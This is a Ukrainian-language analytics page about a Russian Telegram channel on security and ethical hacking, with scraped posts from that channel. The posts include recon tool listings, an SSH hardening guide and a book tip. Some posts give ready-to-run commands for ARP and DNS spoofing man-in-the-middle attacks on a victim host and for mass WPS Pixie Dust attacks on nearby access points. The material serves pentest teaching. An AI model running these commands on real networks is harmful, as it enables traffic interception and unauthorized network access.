CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Показати більше📈 Аналітичний огляд Telegram-каналу CodeGuard: PySec Edition
Канал CodeGuard: PySec Edition є активним учасником. На даний момент спільнота об'єднує 14 117 підписників, посідаючи 8 765 місце в категорії Технології та додатки та 45 874 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 14 117 підписників.
За останніми даними від 27 вересня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 805, а за останні 24 години на -8, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 9.78%. Протягом перших 24 годин після публікації контент зазвичай збирає 5.55% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 1 378 переглядів. Протягом першої доби публікація в середньому набирає 782 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 7.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як codeguard, pysec, docker, grep, контейнер.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Завдяки високій частоті оновлень (останні дані отримано 28 вересня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
🧩 Функционал Hunner включает: 1. SQL-сканирование для выявления уязвимых мест в базах данных. 2. XSS-сканирование для поиска точек внедрения вредоносного JavaScript. 3. DOS-тесты для проверки устойчивости (только с разрешения!). 4. Bruteforce FTP — атаки на тестовые учётные данные. 5. Bruteforce SSH — проверка надёжности SSH-креденшел. 6. Bruteforce почтовых аккаунтов (для тестовых данных).🐱 Репозиторий и подробности 😈 CodeGuard | Chat
anew -d example.com -o output.txt
😆 SubOver — инструмент для поиска поддоменов с помощью пассивных и активных методов, включая bruteforce с уникальными словарями.
subover -d example.com
🛡 Sn1per — автоматизированный скрипт для показа багов и уязвимостей, объединяет более 100 пентест-утилит в одном наборе. Отлично подходит для быстрого и глубокого исследования.
sn1per -t target.com -m passive
😄 Httpx — ультрабыстрый инструмент для проверки живых URL, анализа заголовков и SSL-сертификатов, с большим потенциалом для кастомизации.
httpx -l urls.txt -ssl -title
🎣 Gau (GetAllUrls) — позволяет за секунды вытащить все возможные URL целевого домена из различных публичных источников и кэшей.
gau example.com > urls.txt
💡 QTester — Python-инструмент для автоматизации SQL-инъекций и XSS с анализом пригодности payload’ов. Полезен на этапах ручного и полуавтоматического тестирования.
Рекомендую для изучения: — https://github.com/projectdiscovery/anew — https://github.com/Ice3man543/SubOver — https://github.com/1N3/Sn1per — https://github.com/projectdiscovery/httpx — https://github.com/lc/gau — https://github.com/QTesterПогружайся глубже😂 , автоматизируй быстрее и не забывай ставить 👍) 😈 CodeGuard | Chat
ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"
Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования.
Копируем публичный ключ на сервер:
ssh-copy-id user@server
🖥 2. Настройка SSH клиента для удобства и безопасности
Правим файл ~/.ssh/config:
Host myserver
HostName server.example.com
User user
Port 2222
IdentityFile ~/.ssh/id_ed25519
IdentitiesOnly yes
Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й.
⚙️ 3. Отключение паролей для повышения безопасности
На сервере редактируем /etc/ssh/sshd_config:
PasswordAuthentication no PermitRootLogin no PubkeyAuthentication yes Port 2222Делаем резервную копию файла перед изменением и перезапускаем SSH:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd
🐳 4. Использование шифров и алгоритмов
Для контроля алгоритмов добавим в ~/.ssh/config:
Host myserver
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
KexAlgorithms curve25519-sha256
Ограничение по криптографии улучшает защиту от устаревших и слабых методов.
📌 5. Включение двухфакторной аутентификации (2FA)
Устанавливаем Google Authenticator на сервер:
sudo apt install libpam-google-authenticator
google-authenticator
Добавляем в /etc/pam.d/sshd строку:
auth required pam_google_authenticator.soИ в sshd_config:
ChallengeResponseAuthentication yes AuthenticationMethods publickey,keyboard-interactiveПерезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps
📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest
Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource
sudo apt install dsniff
# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1
# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt
Содержимое hosts.txt:
example.com 1.2.3.4🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:
sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof
- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS.
🛜 dnschef — DNS-прокси для легкой подмены:
sudo apt install python3-pip
pip3 install dnschef
sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com
Всё, что запросит example.com — получит 5.6.7.8.
⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat
🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat
🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей📥 Установка (пример для Kali Linux):
apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator
🚀 Примеры запуска:
— Ручная атака на конкретные цели:
penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11
— Сканирование и атака всех точек на канале 1:
penetrator -i wlan0 -c 1
— Атака всех доступных точек с WPS с использованием Pixie Dust:
penetrator -i wlan0 -A
— Последовательная атака поочерёдно всех точек с WPS:
penetrator -i wlan0 -A -M
⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение
📂 Репозиторий на GitHub
😈 CodeGuard | Chat👩💻 Весь курс разбит на ежедневные задачи с ресурсами и материалами. Темы охватывают: — Network+ (основы сетей) — Security+ (принципы безопасности) — Linux (основы и командная строка) — Python (для задач безопасности) — Анализ сетевого трафика — Git (контроль версий) — ELK (логирование и аналитика) — Облачные платформы: GCP, AWS, Azure — Хакинг (этичный и практический) — Составление резюме и поиск работыЭто структурированный и удобный план для любого уровня, помогающий системно осваивать ключевые навыки ИБ. 📱 План обучения 😈 CodeGuard | Chat
